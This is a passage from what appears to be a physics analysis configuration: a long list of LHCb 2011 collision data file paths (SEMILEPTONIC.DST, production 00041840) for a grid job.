'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058389_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035321_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034632_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057209_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025390_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039377_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031251_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049207_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040535_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001534_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042173_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015951_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002903_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040402_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058835_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064321_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060564_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058832_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014599_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027401_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068073_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045852_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049394_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047521_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001381_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002048_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027659_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027723_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060827_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014484_1.semileptonic.dst',
